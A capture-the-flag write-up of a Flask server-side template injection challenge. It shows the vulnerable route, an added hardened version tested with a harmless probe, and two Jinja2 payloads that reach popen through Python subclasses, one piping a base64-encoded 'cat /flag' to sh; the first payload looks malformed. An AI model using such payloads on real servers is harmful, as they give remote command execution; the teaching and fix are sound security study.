easy_ssti 100 (Fool's Cup)
Viewing the page source reveals a hint: app.zip.
Download the source archive and open it: the application is a Python Flask web app.
from flask import Flask
from flask import render_template_string, render_template

app = Flask(__name__)

@app.route('/hello/')
def hello(name=None):
    return render_template('hello.html', name=name)

@app.route('/hello/<name>')
def hellodear(name):
    # User input is formatted into the template source itself, so Jinja2
    # evaluates any {{ ... }} expression the client puts in <name>.
    if "ge" in name:
        return render_template_string('hello %s' % name)
    elif "f" not in name:
        return render_template_string('hello %s' % name)
    else:
        return 'Nonononon'
Effectively no filtering: the "f" check only runs when the name does not contain "ge", so any name containing "ge" goes straight into render_template_string.
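To show why the route is injectable and what the fix looks like, here is an added example (not the challenge author's code) that puts the vulnerable pattern next to a hardened version and checks both with Flask's test client. The route names /vuln and /safe and the harmless {{7*7}} probe are my own choices; it assumes Flask is installed.

```python
# Added example: vulnerable vs. hardened use of render_template_string,
# exercised with Flask's test client (assumes Flask is installed).
from urllib.parse import quote

from flask import Flask, render_template_string

app = Flask(__name__)


@app.route("/vuln/<name>")
def vuln(name):
    # Vulnerable: user input becomes part of the template *source*, so
    # Jinja2 evaluates any {{ ... }} / {% ... %} it contains.
    return render_template_string("hello %s" % name)


@app.route("/safe/<name>")
def safe(name):
    # Hardened: the template source is a constant; user input is passed as a
    # context variable, rendered only as data and autoescaped.
    return render_template_string("hello {{ name }}", name=name)


def render(route, name):
    """GET <route>/<name> through the test client and return the body as text."""
    path = route + "/" + quote(name, safe="")
    with app.test_client() as client:
        return client.get(path).get_data(as_text=True)


# Constructed detection probe: a template expression with a predictable result.
PROBE = "{{7*7}}"


def is_template_injectable(route):
    """True if the route evaluated a client-supplied template expression."""
    return "49" in render(route, PROBE)


if __name__ == "__main__":
    print(render("/vuln", PROBE))  # hello 49
    print(render("/safe", PROBE))  # hello {{7*7}}
```

The point of the hardened route is not escaping or filtering the name but never letting client data become template source: Jinja2 only evaluates what is in the template string, and in /safe that string is a constant.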
Test:
payload:
{{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen'].read()}}
{{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('echo "Y2F0IC9mbGFn"|base64 -d|sh').read()}}